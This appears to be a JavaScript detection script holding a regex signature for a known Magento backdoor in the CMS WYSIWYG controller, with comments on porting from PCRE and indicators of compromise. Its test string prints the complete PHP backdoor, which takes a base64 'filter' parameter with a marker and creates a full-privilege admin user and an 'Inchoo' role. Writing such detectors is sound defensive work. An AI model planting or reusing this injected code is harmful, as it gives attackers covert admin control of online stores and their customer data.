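// Detection signature for a block injected at the top of
// Mage_Adminhtml_Cms_WysiwygController::directiveAction(). It matches code that
// base64-decodes a request parameter, checks for the `_rieqyns13_was_here`
// marker, creates an admin user and a role whose name starts with "Inchoo",
// echoes "success" and exits. The match is anchored between the method's
// opening brace and the original `$directive = ...getParam('___directive');`
// line, so m[0] is exactly the injected span to review or strip.
//
// The pattern was written for PCRE; two constructs had to be ported:
//   - `\K` (reset match start) does not exist in JavaScript, where `\K` would
//     just match a literal "K". The method header is now a lookbehind, which
//     keeps it out of m[0] in the same way.
//   - `(*COMMIT)` is a PCRE backtracking verb. In a JavaScript literal `(*` is
//     a SyntaxError ("nothing to repeat"), so the script never ran. It is
//     dropped; without it the engine keeps backtracking after a near miss, so
//     this version can only match the same or more text than the PCRE one and
//     may be slow on large near-miss input (`.*?` is unbounded under `s`).
//     Bound file size or run time when scanning untrusted files.
//
// Flags: g = all occurrences, i = the lower-case `setdata`/`setname`/`success`
// in the pattern also match `setData`/`setName`/`Success`, s = `.` spans newlines.
const regex = /(?<=public function directiveAction\(\)\s*\{\s*)if\(isset\(\$\w+\[['"][^{]+\{\s*\$\w+=base64_decode\(\$\w+\[[^;]+;\s*if\(preg_match\(['"]\/_rieqyns13_was_here[^{]+\{\s*preg_match\("\/_rieqyns13_was_here[^{]+\{\s*\$user[\s=]+Mage\:+getModel\('admin\/user'\)\s*->setdata\(array\(\s*'username.*?setname\(['"]Inchoo.{0,700}?setRoleIds\(array\(\$role(?:[^}]+\}\s*)+?echo\s*['"]success['"];exit;\s*\}\s*if\(preg_match\(['"][^{]+\{\s*header\(['"].{0,50}?Unauthorized['"]\);exit;\s*\}\s*\}(?=\s*\$directive = \$this->getRequest\(\)->getParam\('___directive'\);)/gis;
// Alternative syntax using RegExp constructor (same JavaScript-compatible pattern)
// const regex = new RegExp('(?<=public function directiveAction\\(\\)\\s*\\{\\s*)if\\(isset\\(\\$\\w+\\[[\'"][^{]+\\{\\s*\\$\\w+=base64_decode\\(\\$\\w+\\[[^;]+;\\s*if\\(preg_match\\([\'"]\\\/_rieqyns13_was_here[^{]+\\{\\s*preg_match\\("\\\/_rieqyns13_was_here[^{]+\\{\\s*\\$user[\\s=]+Mage\\:+getModel\\(\'admin\\\/user\'\\)\\s*->setdata\\(array\\(\\s*\'username.*?setname\\([\'"]Inchoo.{0,700}?setRoleIds\\(array\\(\\$role(?:[^}]+\\}\\s*)+?echo\\s*[\'"]success[\'"];exit;\\s*\\}\\s*if\\(preg_match\\([\'"][^{]+\\{\\s*header\\([\'"].{0,50}?Unauthorized[\'"]\\);exit;\\s*\\}\\s*\\}(?=\\s*\\$directive = \\$this->getRequest\\(\\)->getParam\\(\'___directive\'\\);)', 'gis')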
// Test subject: PHP source of Mage_Adminhtml_Cms_WysiwygController in which
// directiveAction() carries an injected block ahead of its original body.
// The injected block reads the `filter` request parameter, base64-decodes it,
// and when the `_rieqyns13_was_here` marker is present it creates an active
// admin user from the supplied name and password, creates a role named
// 'Inchoo' with resources array("all"), links the two, prints "Success" and
// exits. The original handler resumes at `$directive = ...`.
// Indicators visible in the sample that are worth checking in the admin user
// and role lists of an affected store: role name 'Inchoo', first name
// 'Developer' / last name 'User', e-mail of the form developer<number>@<server name>.
// Each `\$` yields a literal `$` inside the template literal.
const str = `
* @category Mage
* @package Mage_Adminhtml
* @author Magento Core Team <core@magentocommerce.com>
*/
class Mage_Adminhtml_Cms_WysiwygController extends Mage_Adminhtml_Controller_Action
{
/**
* Template directives callback
*
* TODO: move this to some model
*/
public function directiveAction()
{
if(isset(\$_REQUEST["filter"])){
\$jembot=base64_decode(\$_REQUEST["filter"]);
if(preg_match("/_rieqyns13_was_here/",\$jembot)){
preg_match("/_rieqyns13_was_here(.+?)_rieqyns13_(.+?)_rieqyns13_was_here/",\$jembot,\$m);
\$base = getcwd();
require_once \$base."/app/Mage.php";
Mage::app();
\$user=null;
\$role=null;
try {
\$user = Mage::getModel('admin/user')
->setData(array(
'username' => base64_decode(\$m[1]),
'firstname' => 'Developer',
'lastname' => 'User',
'email' => 'developer'.rand(0,10000).'@'.\$_SERVER['SERVER_NAME'],
'password' => base64_decode(\$m[2]),
'is_active' => 1
))->save();
} catch (Exception \$e) {
echo \$e->getMessage();
exit;
}
try {
\$role = Mage::getModel("admin/roles")
->setName('Inchoo')
->setRoleType('G')
->save();
Mage::getModel("admin/rules")
->setRoleId(\$role->getId())
->setResources(array("all"))
->saveRel();
} catch (Mage_Core_Exception \$e) {
echo \$e->getMessage();
exit;
} catch (Exception \$e) {
echo 'Error while saving role.';
exit;
}
try {
\$user->setRoleIds(array(\$role->getId()))
->setRoleUserId(\$user->getUserId())
->saveRelations();
} catch (Exception \$e) {
echo \$e->getMessage();
exit;
}
echo "Success";exit;
}
if(preg_match("/insert/i",\$jembot)){
header("HTTP/1.1 403 Unauthorized");exit;
}
}
\$directive = \$this->getRequest()->getParam('___directive');
\$directive = Mage::helper('core')->urlDecode(\$directive);
\$url = Mage::getModel('core/email_template_filter')->filter(\$directive);
try {
\$image = Varien_Image_Adapter::factory('GD2');
\$image->open(\$url);
\$image->display();
} catch (Exception \$e) {
\$image = Varien_Image_Adapter::factory('GD2');
\$image->open(Mage::getSingleton('cms/wysiwyg_config')->getSkinImagePlaceholderUrl());
\$image->display();
/*
\$image = imagecreate(100, 100);
\$bkgrColor = imagecolorallocate(\$image,10,10,10);
imagefill(\$image,0,0,\$bkgrColor);
\$textColor = imagecolorallocate(\$image,255,255,255);
imagestring(\$image, 4, 10, 10, 'Skin image', \$textColor);
header('Content-type: image/png');
imagepng(\$image);
imagedestroy(\$image);
*/
}
}
}`;
// Report every occurrence of the signature in `str`, one console line per group.
// String.prototype.matchAll steps past zero-width matches on its own, so no
// manual lastIndex adjustment is needed here.
for (const hit of str.matchAll(regex)) {
  // Index 0 is the whole matched text; higher indexes would be capture groups.
  for (const [groupIndex, match] of hit.entries()) {
    console.log(`Found match, group ${groupIndex}: ${match}`);
  }
}